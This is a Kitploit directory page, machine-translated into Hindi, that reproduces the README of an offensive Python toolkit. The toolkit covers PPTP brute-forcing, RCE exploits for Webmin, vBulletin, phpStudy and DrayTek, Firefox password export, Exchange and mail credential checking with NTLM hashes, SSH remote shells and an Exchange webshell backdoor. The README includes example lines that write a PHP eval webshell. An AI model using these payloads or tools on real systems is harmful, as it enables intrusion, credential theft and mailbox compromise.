Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Homework-of-Python — पायथन कोड्स ऑफ़ माय ब्लॉग। | Kitploit
उपकरण/GitHubGitHub/3gstudent/homework-of-python
भेद्यता स्कैनरपासवर्ड हमलेशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणरेड टीमिंगपेलोड डेवलपमेंट
GitHub3gstudent/homework-of-python

Homework-of-Python

पायथन कोड्स ऑफ़ माय ब्लॉग।

रिपॉजिटरी देखें
412126183 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Python-का-होमवर्क

मेरे ब्लॉग के Python कोड।

pptp_password_hack.py

PPTP VPN का पासवर्ड पाने के लिए ब्रूट-फोर्स हमले का उपयोग करें।

यह फ़ाइल (wordlist नामक) में पासवर्ड पढ़ेगा और फिर सर्वर से कनेक्ट करने के लिए pptpsetup का उपयोग करेगा।

समय अंतराल 10 सेकंड है।


portscan.py

पोर्ट स्कैन करने के लिए उपयोग करें।

टाइमआउट 3 सेकंड है।

c++ संस्करण:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

URL से IP प्राप्त करने के लिए उपयोग करें।

मैं Sublist3r के परिणाम को सीधे उपयोग कर सकता हूँ।

file_deduplication(For_urltoip).py

Sublist3r के परिणाम से डुप्लिकेट IP हटाने के लिए उपयोग करें।

मैं urltoip.py के परिणाम को सीधे उपयोग कर सकता हूँ।

Sublime(F9) का उपयोग करके IP को क्रमबद्ध किया जा सकता है।


file_deduplication.py

फ़ाइल से डुप्लिकेट आइटम हटाने के लिए उपयोग करें।

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

संदर्भ:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

fofa का API कॉल करने और परिणामों से IP प्रिंट करने के लिए उपयोग किया जाता है।

आप 100 परिणाम प्राप्त कर सकते हैं।

fofa_api_VIP.py

fofa का API कॉल करने और परिणामों से IP प्रिंट करने के लिए उपयोग किया जाता है।

यदि आप VIP हैं, तो आपको 10000 परिणाम मिलेंगे।


vBulletin_5.x_0day_pre-auth_RCE.py

संदर्भ:

https://seclists.org/fulldisclosure/2019/Sep/31

उदा.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

संदर्भ:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

उदा.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Firefox का पासवर्ड निर्यात करने के लिए उपयोग करें

get_Exchange_version.py

Exchange का संस्करण प्राप्त करने के लिए उपयोग करें।

पहले URL के सोर्स कोड से BuildNumber प्राप्त करें और फिर संस्करण प्राप्त करें।

संदर्भ:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

SMBv3 RCE भेद्यता को स्कैन करने के लिए उपयोग करें।

टाइमआउट 3 सेकंड है।


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

संदर्भ:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, तथा Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, और 1.4.4_Beta डिवाइस cgi-bin/mainfunction.cgi URI.. पर shell मेटाकैरेक्टर के माध्यम से बिना प्रमाणीकरण के रूट के रूप में रिमोट कोड निष्पादन की अनुमति देते हैं।

प्रभावित उत्पाद:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Zimbra मेल सर्वर से कनेक्ट करने के लिए Zimbra SOAP API का उपयोग करें।

उपयोग:

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

मोड:

  • low निम्न टोकन के लिए प्रमाणीकरण
  • admin एडमिन टोकन के लिए प्रमाणीकरण
  • ssrf एडमिन टोकन प्राप्त करने के लिए CVE-2019-9621 का उपयोग करें

उदा:

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Exchange Web Service के वैध खाते की जाँच करने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

संदर्भ:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

उपयोग:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

उदा.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Autodiscover.xml तक पहुँचने और उपयोगकर्ता की कॉन्फ़िगरेशन प्राप्त करने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

उपयोग:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

उदा.

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

checkAutodiscover.py का अतिरिक्त मोड

पैरामीटर जोड़ें

ewsManage.py

Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

उपयोग:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


उदा.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

SSH की वैध क्रेडेंशियल जाँचने के लिए उपयोग करें (पासवर्ड और privatekeyfile समर्थन)

उपयोग:

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

उदा.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

SSH के माध्यम से रिमोट कमांड निष्पादन (पासवर्ड और privatekeyfile समर्थन)

उपयोग:

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

उदा.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

eas (Exchange Server ActiveSync) की वैध क्रेडेंशियल जाँचने के लिए उपयोग करें

उपयोग:

easCheck.py <host> <user> <password>

उदा.

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

OWA से कनेक्ट करके Exchange के वैध खाते की जाँच करने के लिए उपयोग करें।

उपयोग:

checkOWA.py <url> <user> <password>

owaManage.py

OWA से कनेक्ट करके मेल पढ़ने के लिए उपयोग करें।

उपयोग:

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

मेल सर्वर से कनेक्ट करने के लिए IMAP का उपयोग करें।

उपयोग:

imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

execCmd.aspx के साथ NTLM प्रमाणीकरण लागू करने और संचार करने के लिए उपयोग करें

संचार डेटा Base64 के साथ एन्कोड किया जाता है

उपयोग:

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

C sharp संस्करण: SharpExchangeBackdoor.cs

Exchange वेबशेल बैकडोर पर पेलोड भेजने के लिए उपयोग करें।

समर्थन:

  • assemblyLoad
  • webshellWrite

उपयोग:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

उदा.

टूल डाउनलोड करें